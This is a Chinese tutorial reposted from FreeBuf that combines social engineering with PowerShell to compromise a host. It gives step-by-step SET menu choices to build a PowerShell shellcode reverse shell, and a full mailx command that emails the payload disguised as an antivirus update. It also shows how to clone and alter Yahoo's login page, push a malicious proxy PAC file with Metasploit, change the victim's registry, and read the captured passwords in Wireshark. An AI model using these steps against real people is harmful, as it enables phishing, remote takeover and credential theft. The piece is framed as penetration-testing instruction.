混搭新式:社工+powershell,轻松畅游主机

在渗透测试过程有时候会需要从已经被入侵的主机拿到你想要的凭据。

此时你已经成功通过社工获得web应用程序里面系统管理员或其他用户的权限并且已经建立了meterpreter的会话,可以转储密码哈希值或使用Mimikatz输出内存里面的明文凭证。但如果他们一两天之内没有登陆Web应用,你可以使用以下的两种方法碰碰运气。

你需要做的第一件事是,通过社工的方式进入他们的电脑。最好是使用一个powershell脚本建立一个反向连接。为什么使用powershell?因为要避免杀毒软件提醒任何管理员,而powershell很少被杀软列入黑名单。你可以自己编写powershell脚本,但在SET(社会工程学工具包)中已经提供了,所以在这里我们使用这个工具。

使用如下步骤运行SET。

1、打开终端运行setoolkit

2、我们要进行社会工程学攻击,选择1

3、选择9利用powershell攻击

4、选择1,使用powershell注入shellcode

5、输入要反弹的ip和端口,默认端口是443。你可以使用Metasploit调用set并使用multi/handler监听。

6、SET会把生成的powershell脚本存放在/root/.set/reports/powershell/下。进入这个目录并将x86_powershell_injection.txt重命名为Anti-Virus-Update.bat这样比较诱人的名字。我们会向目标发送邮件,伪装成杀毒软件的更新。

7、打开一个新的终端,你需要使用smtp服务器进行发信。输入如下命令。

echo -e “Please save the attached file to your Desktop and double click it. This file will automatically update your Anti-Virus software with the latest version to protect your computer from the latest threats. \n\nBest regards,\nThe Help Desk” | mailx -v -r “helpdesk@infoseclocal.com” -s “Anti-Virus Update” -S smtp=”server2012r2” -a /root/.set/reports/powershell/Anti-Virus-Update.bat jsmith@infoseclocal.com

8、当他们收到邮件的时候,看到的是这个样子的。

9、如果他们遵循了你的建议,那你会看到一个meterpreter会话建立起来。你可以通过这个会话获取一些信息。

你可以使用arpspoof进行中间人攻击,但如果客户端上有IDS的话可能会发出些警告。然而,有一个更好的方法来获取用户的凭证并发送到你的电脑,那就是成为他们的web代理。但我们不能代理他们所有访问的网站,我们只需要代理需要收集凭据的网站。

首先需要创建一个pac文件,内容看起来像这样。

在本例中,我们关心的是yahoo的凭据,其他的https请求应该按照各自的主机进行转发。接下来要做的是下载yahoo登陆页面的源文件,并适当的修改它。具体而言就是要修改用户的单击登陆按钮时将采取的操作。我们切换到/var/www目录下,我们要重定向受害者的请求并截取凭据。使用Wget下载yahoo的登陆页面。

现在到了棘手的部分。我们需要受害人访问这个被修改后的页面,但又不能被察觉到异常。打开下载后的index.html文件,搜索”action”,将值修改为cred.html,并在/var/www目录下建立cred.html文件。你的index.html文件看起来如下面这个样子。

删除掉无用的js代码。

修改cred.html文件如下。

这样当受害者向假的login.yahoo.com输入凭证,然后重定向到https://www.yahoo.com。他们将不太会怀疑,以为自己输错了账号密码。

启动kali上的apache服务。

让meterpreter会话后台运行。

在制定会话上运行ie_proxypac模块,上传编写好的proxy.pac文件到目标电脑。这个模块会让ie的代理设置使用我们上传的pac文件。

打开msfconsole,输入use post/windows/manage/ie_proxypac。通过show options查看可设置的选项。

这个利用模块不需要设置很多信息。设置好后运行,看到如下图的样子 。

接下来启动wireshark。

当受害者浏览login.yahoo.com的时候,访问的是http的版本而不是https的。

输入完凭据之后,会重定向到https://www.yahoo.com。

现在在wireshark查看输入的凭据。为了有效的做到这一点,你需要对身份认证系统有点研究。本例login.yahoo.com使用“passwd”传输密码值。Edit > Find Packet,参数类型为“string”,搜索范围是“Packet bytes”,然后点击查找按钮。

搜索到的结果被高亮显示。

右击这个包,选择“Follow TCP Stream”。仔细看可以看到受害者输入的用户名和密码。

注意这里有个坑。微软正在慢慢弃用使用proxy.pac设置代理的方式,这种方式在ie11中是无效的。但我们可以通过meterpreter会话修改注册表的值使得可用。

reg createkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\

上述命令创建了Key,接着设置key的值。

reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\ -t REG_DWORD -v EnableLegacyAutoProxyFeatures -d 1

如果一切顺利,我们的受害者应该会向我们发送凭证,无论使用Internet Explorer 11或任何其他版本的ie浏览器。

*参考来源:resources.infosecinstitute,FB小编东二门陈冠希编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-05-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏安恒信息

安全漏洞公告

1 OpenSSL TLS心跳扩展协议包远程信息泄露漏洞 OpenSSL TLS心跳扩展协议包远程信息泄露漏洞发布时间:2014-04-07漏洞编号:CVE(C...

3726
来自专栏雪胖纸的玩蛇日常

python3+django2 开发易语言网络验证(上)

3254
来自专栏码字搬砖

Hbase原理详解

首先指出图片的一个错误,Hlog应该属于HRegionserver的,不应该在HRegion中。

2953
来自专栏difcareer的技术笔记

最新版MacOS(10.13.2)编译Android 4.4.4源码

网上搜一下Mac编译Android源码,能搜到很多,但最新版的MacOS(10.13.2)编译Android4.4.4的却没有,本文记录我的编译过程。

1564
来自专栏月色的自留地

新麦装机问题汇

1423
来自专栏信安之路

Window 提权基础

再加上个人的理解写出的关于 Windows 提权基础的文章,其中有些地方因为不太实用所以做了适当修改,感谢 @hl0rey 的帮助和建议。

1980
来自专栏醉梦轩

Ubuntu安装Proxychains

7183
来自专栏阿杜的世界

RocketMQ学习-消息发布和订阅

前面一篇文章分析了broker的启动过程,浏览了broker的基本功能。接下来的几篇文章,准备按照十分钟入门RocketMQ一文中提到的一系列特性,依次进行学习...

5332
来自专栏黑白安全

网站漏洞扫描工具 WAScan-Web Application Scanner

WAScan是一款开源工具,该工具采用的是基于黑盒的漏洞挖掘方法,这也就意味着研究人员无需对Web应用程序的源代码进行研究,它可以直接被当作成一种模糊测试工具来...

7543
来自专栏腾讯移动品质中心TMQ的专栏

像 google 一样测试系列之六: 实战篇

本文主要介绍 google 一样测试系列的实战内容,Mock 和反射执行,会穿插在各章节中,因此不单独成节了。

1521

扫码关注云+社区

领取腾讯云代金券